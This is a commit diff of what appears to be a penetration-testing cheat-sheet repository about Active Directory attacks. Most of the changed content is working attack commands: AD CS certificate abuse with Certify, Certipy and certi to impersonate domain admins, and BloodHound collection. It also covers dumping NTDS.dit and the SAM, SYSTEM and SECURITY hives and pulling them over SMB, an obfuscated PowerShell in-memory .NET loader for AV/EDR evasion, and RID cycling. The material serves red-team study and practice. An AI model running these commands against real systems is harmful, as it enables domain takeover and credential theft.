[AHK] Automatic update 👽

docs/README.md

@@ -6443,7 +6443,6 @@ $ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.10.13.37
 
 ```
 $ snmp-check -v 2c -c public 10.10.13.37
-$ for i in `seq 1 254`; do snmp-check -v 2c -c public -t1 10.10.13.$i | grep --text -A2 'System information'; done
 ```
 
 

pentest/infrastructure/README.md

@@ -2,7 +2,7 @@
 
 ```
 cd; mkdir ws; cd ws  # workspace
-mkdir -p discover/{subnets,hosts,services} enum/bloodhound/bloodhound.py exploit/ loot/ log/ screenshots/ shells/ tickets/ traffic/
+mkdir -p discover/{subnets,hosts,services} enum/bloodhound/bloodhound.py loot/ log/ screenshots/ shells/ smb/ tickets/ traffic/ adcs/
 touch ~/ws/loot/net-ntlmv2.txt
 ```
 

pentest/infrastructure/ad/README.md

@@ -54,15 +54,6 @@ $ ./BloodHound
 
 #### Collectors
 
-##### SharpHound.ps1
-
-- [https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1)
-
-```
-PS > Invoke-Bloodhound [-Domain megacorp.local] [-LdapUsername snovvcrash] [-LdapPassword 'Passw0rd!'] -CollectionMethod All,GPOLocalGroup [-Stealth] -CollectAllProperties -OutputDirectory C:\Windows\Temp -NoSaveCache -RandomizeFilenames -ZipFileName backup_full.zip [-Throttle 100] [-Jitter 20]
-PS > Invoke-Bloodhound -CollectionMethod SessionLoop -Loop -LoopInterval 00:01:00 -Loopduration 03:09:41
-```
-
 ##### SharpHound.exe
 
 - [https://github.com/BloodHoundAD/SharpHound3](https://github.com/BloodHoundAD/SharpHound3)
@@ -76,6 +67,15 @@ PS > .\SharpHound.exe [-d megacorp.local] [--LdapUsername snovvcrash] [--LdapPas
 PS > .\SharpHound.exe -c SessionLoop --Loop --LoopInterval 00:01:00 --Loopduration 03:09:41
 ```
 
+##### SharpHound.ps1
+
+- [https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1)
+
+```
+PS > Invoke-Bloodhound [-Domain megacorp.local] [-LdapUsername snovvcrash] [-LdapPassword 'Passw0rd!'] -CollectionMethod All,GPOLocalGroup [-Stealth] -CollectAllProperties -OutputDirectory C:\Windows\Temp -NoSaveCache -RandomizeFilenames -ZipFileName backup_full.zip [-Throttle 100] [-Jitter 20]
+PS > Invoke-Bloodhound -CollectionMethod SessionLoop -Loop -LoopInterval 00:01:00 -Loopduration 03:09:41
+```
+
 ##### BloodHound.py
 
 * [https://github.com/fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py)

pentest/infrastructure/ad/ad-cs-abuse/README.md

@@ -60,7 +60,7 @@ PS > $CATemplateNames = Get-ADObject $CAs[0].DistinguishedName -Properties certi
 PS > $CATemplateNames
 Or
 $ windapsearch --dc 192.168.1.11 -d megacorp.local -u snovvcrash -p 'Passw0rd!' -m custom --filter '(objectCategory=pKIEnrollmentService)' --base 'CN=Configuration,DC=megacorp,DC=local' --attrs dn,dnshostname
-$ windapsearch --dc 192.168.1.11 -d megacorp.local -u snovvcrash -p 'Passw0rd!' -m custom --filter '(distinguishedName=CN=CA01,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=megacorp,DC=local)' --base 'CN=Configuration,DC=megacorp,DC=local' --attrs certificateTemplates
+$ windapsearch --dc 192.168.1.11 -d megacorp.local -u snovvcrash -p 'Passw0rd!' -m custom --filter '(distinguishedName=CN=CorpCA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=megacorp,DC=local)' --base 'CN=Configuration,DC=megacorp,DC=local' --attrs certificateTemplates
 ```
 
 Enumerate AD Enterprise CAs with certutil from a domain-joined machine:
@@ -197,7 +197,7 @@ Cmd > .\Certify.exe find /quiet
 Request NTLM hash when the account is authenticated with a TGT through PKINIT with Kekeo:
 
 ```
-Cmd > .\kekeo.exe "tgt::pac /caname:CA01 /domain:megacorp.local /subject:snovvcrash /castore:current_user" "exit"
+Cmd > .\kekeo.exe "tgt::pac /caname:CorpCA /domain:megacorp.local /subject:snovvcrash /castore:current_user" "exit"
 ```
 
 
@@ -220,7 +220,7 @@ Search for any template that allows domain authentication (a stock published tem
 Request a new certificate for enrolling current user context:
 
 ```
-Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CA01 /template:User
+Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CorpCA /template:User
 ```
 
 This will output a certificate and private key in `.pem`. To convert it to `.pfx` compatible with Rubeus do:
@@ -245,7 +245,7 @@ Same as for **PERSIST1** but requesting a certificate for enrolling current mach
 
 ```
 # While elevated
-Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CA01 /template:Machine /machine
+Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CorpCA /template:Machine /machine
 ```
 
 With access to a machine account certificate an adversary can use S4U2Self to obtain a Kerberos ticket to any service on the host (see [RBCD Abuse](/pentest/infrastructure/ad/delegation-abuse#resource-based-constrained-delegation-rbcd)) or generate a silver ticket.
@@ -290,13 +290,13 @@ Conditions:
 1\. Request an enrollment agent certificate:
 
 ```
-Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CA01 /template:Vuln-EnrollAgentTemplate
+Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CorpCA /template:Vuln-EnrollAgentTemplate
 ```
 
 2\. Request a certificate on behalf of another to a template that allow for domain authentication:
 
 ```
-Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CA01 /template:User /onbehalfon:MEGACORP\ITAdmin /enrollcert:enrollmentAgentCert.pfx /enrollcertpw:Passw0rd!
+Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CorpCA /template:User /onbehalfon:MEGACORP\ITAdmin /enrollcert:enrollmentAgentCert.pfx /enrollcertpw:Passw0rd!
 ```
 
 
@@ -316,9 +316,9 @@ This means that an adversary can enroll in **any** template configured for domai
 Discover with certutil:
 
 ```
-Cmd > certutil.exe -config "CA01.megacorp.local\CA01" -getreg "policy\EditFlags"
+Cmd > certutil.exe -config "CA01.megacorp.local\CorpCA" -getreg "policy\EditFlags"
 Or
-Cmd > reg.exe query \\CA01.megacorp.local\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\CA01\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy\ /v EditFlags
+Cmd > reg.exe query \\CA01.megacorp.local\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\CorpCA\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy\ /v EditFlags
 ```
 
 Discover with Certify:
@@ -330,19 +330,19 @@ Cmd > .\Certify.exe find
 To abuse request a certificate specifying an `/altname` with any template that allows for domain auth (e.g., the default `User` template which normally doesn't allow to specify alternative names):
 
 ```
-Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CA01 /template:User /altname:DomAdmin
+Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CorpCA /template:User /altname:DomAdmin
 ```
 
 This setting can be set with domain admin's privileges like this (*dangerous, do not do this!*):
 
 ```
-Cmd > certutil.exe -config "CA01.megacorp.local\CA01" -setreg "policy\EditFlags" +EDITF_ATTRIBUTESUBJECTALTNAME2
+Cmd > certutil.exe -config "CA01.megacorp.local\CorpCA" -setreg "policy\EditFlags" +EDITF_ATTRIBUTESUBJECTALTNAME2
 ```
 
 Remove this setting:
 
 ```
-Cmd > certutil.exe -config "CA01.megacorp.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2
+Cmd > certutil.exe -config "CA01.megacorp.local\CorpCA" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2
 ```
 
 
@@ -365,7 +365,7 @@ The "CA Administrator" role allows to set the `EDITF_ATTRIBUTESUBJECTALTNAME2` f
 # Check before setting the flag
 Cmd > hostname
 DC01
-Cmd > certutil.exe -config "CA01.megacorp.local\CA01" -getreg "policy\EditFlags"
+Cmd > certutil.exe -config "CA01.megacorp.local\CorpCA" -getreg "policy\EditFlags"
 
 # Invoke SetConfigEntry
 PS > "$(hostname) : $(whoami)"
@@ -379,22 +379,22 @@ PSPKI > $configReader.SetConfigEntry(1376590, "EditFlags", "PolicyModules\Certif
 # Check after setting the flag (EDITF_ATTRIBUTESUBJECTALTNAME2 should appear in the output)
 Cmd > hostname
 DC01
-Cmd > certutil.exe -config "CA01.megacorp.local\CA01" -getreg "policy\EditFlags"
+Cmd > certutil.exe -config "CA01.megacorp.local\CorpCA" -getreg "policy\EditFlags"
 ```
 
 The "Certificate Manager" role allows to remotely approve pending certificate requests which can by used by an adversary to subvert the "CA certificate manager approval" protection:
 
 ```
 # Request a certificate that requires manager approval with Certify
-PS > .\Certify.exe request /ca:CA01.megacorp.local\CA01 /template:ApprovalNeeded
+PS > .\Certify.exe request /ca:CA01.megacorp.local\CorpCA /template:ApprovalNeeded
 ...
 [*] Request ID : 1337
 
 # Approve a pending request with PSPKI
 PSPKI > Get-CertificationAuthority -ComputerName CA01.megacorp.local | Get-PendingRequest -RequestID 1337 | Approve-CertificateRequest
 
 # Download the issued certificate with Certify
-PS > .\Certify.exe download /ca:CA01.megacorp.local\CA01 /id:1337
+PS > .\Certify.exe download /ca:CA01.megacorp.local\CorpCA /id:1337
 ```
 
 
@@ -444,6 +444,18 @@ Cmd > .\Certify.exe find /vulnerable
 
 
 
+### Certipy
+
+- [https://github.com/ly4k/Certipy](https://github.com/ly4k/Certipy)
+
+Get TGT automatically and list CAs, servers and search for vulnerable certificate templates (output in text, JSON and BloodHound formats):
+
+```
+$ certipy find MEGACORP/snovvcrash:'Passw0rd!'@CA01.megacorp.local
+```
+
+
+
 ### certi
 
 - [https://github.com/zer1t0/certi](https://github.com/zer1t0/certi)

pentest/infrastructure/ad/ad-cs-abuse/esc1.md

@@ -26,12 +26,12 @@ PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-en
 
 
 
-### From Windows
+### Certify
 
 Request a certificate specifying the `/altname` as a domain admin:
 
 ```
-Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CA01 /template:VulnTemplate /altname:DomAdmin
+Cmd > .\Certify.exe request /ca:CA01.megacorp.local\CorpCA /template:VulnTemplate /altname:DomAdmin
 ```
 
 Convert `.pem` to a `.pfx` certificate:
@@ -48,14 +48,30 @@ Cmd > .\Rubeus.exe asktgt /domain:megacorp.local /dc:DC01.megacorp.local /user:D
 
 
 
-### From Linux
+### Certipy
+
+Enroll a certificate with privileged subject in SAN:
+
+```
+$ certipy req megacorp.local/snovvcrash:'Passw0rd!'@CA01.megacorp.local -ca CorpCA -template VulnTemplate -alt '[email protected]'
+```
+
+Request TGT providing certificate and get corresponding NT hash automatically:
+
+```
+$ certipy auth -pfx administrator.pfx -domain megacorp.local -username administrator -dc-ip 192.168.1.11
+```
+
+
+
+### certi
 
 - [https://gist.github.com/Flangvik/15c3007dcd57b742d4ee99502440b250](https://gist.github.com/Flangvik/15c3007dcd57b742d4ee99502440b250)
 
 Enroll a certificate with privileged subject in SAN:
 
 ```
-$ certi.py req megacorp.local/[email protected] CA01 -k -n --dc-ip 192.168.1.11 --template VulnTemplate --alt-name 'DC01$'
+$ certi.py req megacorp.local/[email protected] CorpCA -k -n --dc-ip 192.168.1.11 --template VulnTemplate --alt-name 'DC01$'
 ```
 
 Request TGT providing certificate:

pentest/infrastructure/ad/av-edr-evasion/dotnet-reflective-assembly.md

@@ -28,15 +28,15 @@ This [blog post](https://www.praetorian.com/blog/running-a-net-assembly-in-memor
 An example how the binary can be actually decoded, decompressed and run from memory:
 
 ```powershell
-function Invoke-SomeBinary
+function Invoke-S0m3B1n4ry
 {
 	[CmdletBinding()]
 
 	PARAM (
 		[Parameter(Position = 0, Mandatory = $true)]
 		[ValidateNotNullorEmpty()]
 		[String]
-		$cOmmANd
+		$cOmmANd = " "
 	)
 
 	$a = NeW-obJeCt sYsTeM.Io.MEMoRysTREaM(,[coNveRT]::frombaSE64sTrINg(""))
@@ -49,7 +49,7 @@ function Invoke-SomeBinary
 	$StRInGwritEr = nEW-ObJEct System.IO.STRiNgwRiTEr
 	[cONSOLE]::sEtOut($STringWRITer)
 
-	[SomeBinary.Program]::maiN($COMmaND.SPliT(" "))
+	[S0m3B1n4ry.Program]::maiN($COMmaND.SPliT(" "))
 
 	[cOnsolE]::sEtout($olDCONsOleout)
 	$resUlTs = $sTRInGWRiter.TOSTring()

pentest/infrastructure/ad/credentials-dump/ntds.md

@@ -50,19 +50,19 @@ end backup
 Create a network share with anonymous access and put there all we need:
 
 ```
-mkdir C:\smb_pentest
-copy w:\Windows\NTDS\ntds.dit C:\smb_pentest\ntds.dit
-cmd /c reg.exe save hklm\system C:\smb_pentest\system.hive
-cmd /c reg.exe save hklm\sam C:\smb_pentest\sam.hive
-cmd /c reg.exe save hklm\security C:\smb_pentest\security.hive
-cmd /c net share pentest=c:\smb_pentest /GRANT:"Everyone,FULL"
+cd \Windows\Temp
+copy w:\Windows\NTDS\ntds.dit C:\Windows\Temp\ntds.dit
+cmd /c reg.exe save hklm\system C:\Windows\Temp\system.hive
+cmd /c reg.exe save hklm\sam C:\Windows\Temp\sam.hive
+cmd /c reg.exe save hklm\security C:\Windows\Temp\security.hive
 ```
 
 Connect to the share and grab the files:
 
 ```
-$ smbclient.py 'snovvcrash:[email protected]'
-> use pentest
+$ smbclient.py MEGACORP/administrator:'Passw0rd!'@192.168.1.11
+> use C$
+> cd windows/temp
 > get ntds.dit
 > get system.hive
 > get sam.hive
@@ -100,8 +100,6 @@ reset
 Remove the share and all the traces:
 
 ```
-cmd /c net share pentest /delete
-rm -re -fo C:\smb_pentest
 rm C:\Windows\Temp\meta.cab
 rm add_vol.txt
 rm delete_vol.txt

pentest/infrastructure/ad/delegation-abuse/rbcd.md

@@ -185,6 +185,7 @@ $ secretsdump.py DC01.megacorp.local -just-dc-user 'MEGACORP\krbtgt' -dc-ip 10.1
 
 - [https://exploit.ph/delegate-2-thyself.html](https://exploit.ph/delegate-2-thyself.html)
 - [https://exploit.ph/revisiting-delegate-2-thyself.html](https://exploit.ph/revisiting-delegate-2-thyself.html)
+- [https://www.praetorian.com/blog/red-team-privilege-escalation-rbcd-based-privilege-escalation-part-2/](https://www.praetorian.com/blog/red-team-privilege-escalation-rbcd-based-privilege-escalation-part-2/)
 - [https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/)
 - [https://0xdf.gitlab.io/2021/11/08/htb-pivotapi-more.html#dcsync](https://0xdf.gitlab.io/2021/11/08/htb-pivotapi-more.html#dcsync)
 
@@ -273,6 +274,7 @@ $ sudo mitm6 -i eth0 -d megacorp.local --ignore-nofqdn
 ## WebDav + LDAPS NTLM Relay + RBCD
 
 - [https://gist.github.com/gladiatx0r/1ffe59031d42c08603a3bde0ff678feb](https://gist.github.com/gladiatx0r/1ffe59031d42c08603a3bde0ff678feb)
+- [https://gist.github.com/zimnyaa/dcac97f3106e96053a1acb6ca9974e55#file-webclient-rbcd-sh](https://gist.github.com/zimnyaa/dcac97f3106e96053a1acb6ca9974e55#file-webclient-rbcd-sh)
 - [https://pentestlab.blog/2021/10/18/resource-based-constrained-delegation/](https://pentestlab.blog/2021/10/18/resource-based-constrained-delegation/)
 
 ```

pentest/infrastructure/ad/ntlm/ntlmv1-downgrade.md

@@ -15,7 +15,7 @@ Check with PowerShell:
 PS > (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name LmCompatibilityLevel).LmCompatibilityLevel
 2
 PS > $decValue = (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\ -Name NtlmMinClientSec).NtlmMinClientSec
-PS > $hexValue = "0x" + [string]::Format("{0:x}", $value)
+PS > $hexValue = "0x" + [string]::Format("{0:x}", $decValue)
 PS > $hexValue
 0x20
 ```

pentest/infrastructure/ad/rid-cycling.md

@@ -9,7 +9,7 @@ description: Relative Identifier
 Perform RID cycling attack against a DC with SMB null sessions allowed with [lookupsid.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py):
 
 ```
-$ lookupsid.py MEGACORP/snovvcrash:'Passw0rd!'@127.0.0.1 20000 | tee ~/ws/log/lookupsid.out
+$ lookupsid.py MEGACORP/snovvcrash:'Passw0rd!'@127.0.0.1 20000 [-domain-sids] | tee ~/ws/log/lookupsid.out
 $ cat ~/ws/log/lookupsid.out | grep SidTypeUser | grep -v -e '\$' -e '{' -e '}' -e HealthMailbox | awk -F'\' '{print $2}' | awk '{print $1}' | perl -nle 'print if m{^[[:ascii:]]+$}' > ~/ws/enum/all-users.txt
 ```
 

pentest/infrastructure/snmp.md

@@ -38,6 +38,7 @@ Collect data:
 
 ```
 $ snmp-check -v 2c -c public 10.10.13.37
+$ for i in `seq 1 254`; do snmp-check -v 2c -c public -t1 10.10.13.$i | grep --text -A2 'System information'; done
 ```